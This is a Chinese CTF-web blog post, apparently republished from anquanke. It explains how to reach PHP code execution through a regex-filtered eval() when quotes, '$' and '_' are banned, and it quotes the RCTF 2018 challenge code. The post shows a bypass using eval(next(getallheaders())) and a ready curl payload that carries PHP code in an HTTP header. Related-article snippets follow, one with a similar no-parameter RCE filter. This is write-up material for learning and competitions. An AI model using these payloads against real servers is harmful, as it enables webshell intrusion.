php在多重限制下执行命令

最新推荐文章于 2024-07-12 16:08:50 发布
最新推荐文章于 2024-07-12 16:08:50 发布
阅读量141 收藏
点赞数 1
分类专栏: CTF-web 文章标签: 网络安全 安全
原文链接:https://www.anquanke.com/post/id/270248
版权

php在多重限制下执行命令

问题

怎么在不允许使用 '"$_ 的情况下写一个webshell?

启发

在RCTF 2018的比赛中有相似题目

<?php
sha1($_SERVER['REMOTE_ADDR']) === '99754106633f94d350db34d548d6091a' ?: die();
';' === preg_replace('/[^\W_]+\((?R)?\)/', NULL, $_GET['cmd']) ? eval($_GET['cmd']) : show_source(__FILE__);

这里和上面的条件是非常相似的,也是禁止了下划线,和任意非单词字符。

绕过

其实在PHP中还有一个函数是getallheaders 这个可以获取到整个Http头信息

<?php
print_r(getallheaders());

会打印http头信息。
我们就可以指定Header中的头信息,加入我们的payload就可以绕过。
但是getallheaders()返回的是一个数组,eval()函数里面传递数组是无法生效的。有什么方法能获取到数组里面的具体的键值呢?
next()!
next()函数,可以在函数将内部指针指向数组中的下一个元素,并输出
我们使用eval(next(getallheaders())); 这种方式就可以绕过了上题的要求了,实现无$符号,无特殊字符,下划线的命令执行了。

这样payload为:curl -H "User-Agent: echo(123);" -H "Accept: asdasd/asdasda" "http://localhost:85/test.php?cmd=eval(next(getallheaders()));

dydymm
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP和MySQL Web开发第4版pdf以及源码
10-13
6.7.4 理解多重继承 6.7.5 实现接口 6.8 类的设计 6.9 编写类代码 6.10 理解PHP面向对象新的高级功能 6.10.1 使用Per-Class常量 6.10.2 实现静态方法 6.10.3 检查类的类型和类型提示 6.10.4 克隆对象 ...
php eval()函数
yzl_007的博客
10-08 6625
php eval()函数 (PHP 4, PHP 5, PHP 7, PHP 8) eval — 把字符串作为PHP代码执行 说明 eval(string $code) 把字符串 code 作为PHP代码执行。 函数eval()语言结构是 *非常危险*的, 因为它允许执行任意 PHP 代码。 *它这样用是很危险的。* 如果您仔细的确认过,除了使用此结构以外 别无方法, 请多加注意,*不要允许传入任何由用户 提供的、未经完整验证过的数据* 。 范例 示例 #1 eval(
【转】php eval函数用法
zzz的博客
07-06 1111
php eval ()函数 定义和用法 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。 语法 eval(phpcode) 提示 返回语句会立即终止对字符串的计算。 该函数对于在数据
NSSCTF web学习
akxnxbshai的博客
09-30 1206
NSSCTF web刷题
全国最常用的password前10000名,里面可能有你的密码,快来看看吧
热门推荐
₰₯₮ 的博客
12-23 7万+
1、大家知道国内最常用的密码是什么吗,无非就是,123456、12345678、123456789、1234567890、987654321、0987654321、666666、88888888、123321、1qaz2wsx、111111、abc123、qwerty等等,很常用,但是这些都是以前的密码了
wp2
kelisiyuan的博客
02-22 362
1 https://www.splitbrain.org/services/ook解密 flag{b615c4b79a1aede83b9ae67104ff4eb5} 2 同上网站 flag{99754106633f94d350db34d548d6091a} 3 下载得到 要密码,也不是伪加密 爆破 4132 打开不能播放。 百度odt 没有结果,百度serpent 看来是个加密、...
php for linux 5.4.24
05-24
总结,PHP for Linux 5.4.24是Web开发的重要工具,无论是在Linux还是Mac环境下,都有其独特的安装和使用方法。理解并掌握这些知识点,将有助于开发者更好地利用PHP构建稳定、高效的Web应用程序。
php-5.4.16-src
06-06
- PHP 5.4引入了Traits,这是一种代码重用机制,类似于Java的接口和C++的多重继承,解决了单一继承的限制。 - 引入了短数组语法`[]`,使得创建数组更加简洁。 - 新增了匿名函数(Closure),增强了函数式编程的...
php-5.4.6.tar.gz
12-28
2. 限制文件上传大小和执行时间:为防止DoS攻击,应合理设置`upload_max_filesize`和`max_execution_time`等配置项。 3. 使用最新安全补丁:定期检查并应用PHP安全更新,以防范已知的安全风险。 五、最佳实践与...
PHP和MySQL Web开发第4版
08-13
6.7.4 理解多重继承 6.7.5 实现接口 6.8 类的设计 6.9 编写类代码 6.10 理解PHP面向对象新的高级功能 6.10.1 使用Per-Class常量 6.10.2 实现静态方法 6.10.3 检查类的类型和类型提示 6.10.4 克隆对象 ...
使用无参数函数进行命令执行
kali_Ma的博客
01-17 2526
前言 在这里总结一下无参数命令执行。 环境准备 测试代码 <?php highlight_file(__FILE__); if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } ?> 关键代码 preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']) 这里使用pregreplace替换匹配到的字符为空,\
php获取自定义请求headers,PHP getallheaders无法获取自定义头(headers)的问题
weixin_31597881的博客
04-01 528
在客户端请求的时候增加了自定义的http头,请求如下所示:自定义http请求头var_dump(getallheaders);一开始通过getallheaders参数获取,但是发现在nginx部署的服务器上获取不到,非常奇怪,查看php手册发现getallheaders这个函数只支持apache服务器(实际是/* 兼容不支持 getallheaders函数的环境 */if (!function_e...
使用SpeingMVC做正删改查
yingmengxuepingbao的专栏
10-21 1754
大家好:         痛苦的挨过了一天的
PHP无参数RCE
weixin_43610673的博客
03-14 2827
无参数函数RCE,即在不使用参数的条件下,仅使用函数进行REC。 如:代码中有 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } 这时如果我们用传统的eval($_POST[‘code’]); 则无法通过正则的校验 /[^\W]+((?R)?)/ 对于...
php代码执行与命令注入突破长度限制
Shanfenglan's blog
04-07 858
防御方式 升级到PHP 7.1,该版本对大部分常见的执行动态代码的方法进行了封堵。 php.ini中,关闭“allow_url_fopen”。在打开它的情况下,可以通过 phar:// 等协议丢给include,让其执行动态代码。 php.ini中,通过disable_functions关闭 exec,passthru,shell_exec,system 等函数,禁止PHP调用外部程序。 永远不要在代码中使用eval。 设置好上传文件夹的权限,禁止从该文件夹执行代码。 include
CTFSHOW - Crypto 签到系列
pone2233的博客
12-15 3006
CTF.show-Crypto Crypto 密码学签到 flag{ctf.show} crypto2 flag{3e858ccd79287cfe8509f15a71b4c45d} crypto3 flag{js_da_fa_hao} crypto4 import gmpy2 p = 447685307 q = 2037 e = 17 s = (p-1)*(q-1) d = gmpy2.invert(e,s) print ("dec:...
BSides Noida CTF 2021 web题wowooo&freepoint writeup(两道反序列化)
yink12138的博客
08-12 773
emmm终于开始正经地写第一篇wp了!撒花撒花~这场比赛也算是我第一个没爆零的比赛,自己独立做出来了一道(半?),拿到flag也是相当开心~(当然还是比较菜,大佬轻喷)比完赛之后自己又去把差一点做出来的那道题好好整理了一下,梳理了两道题的思路,又有一些新的想法,写个wp跟大家分享分享~ 下面进入正题。 首先需要了解序列化和反序列化的原理以及数组、对象的序列化格式,还有相关的魔术方法,具体可以看这一篇文章:[CTF]PHP反序列化总结_Y4tacker的博客...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8334
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
医疗健康信息的安全挑战与隐私保护最佳实践
最新发布
2301_79955948的博客
07-12 1314
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
PHP在linux上执行外部命令的方法.docx
01-21
PHP在linux上执行外部命令的方法.docx

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值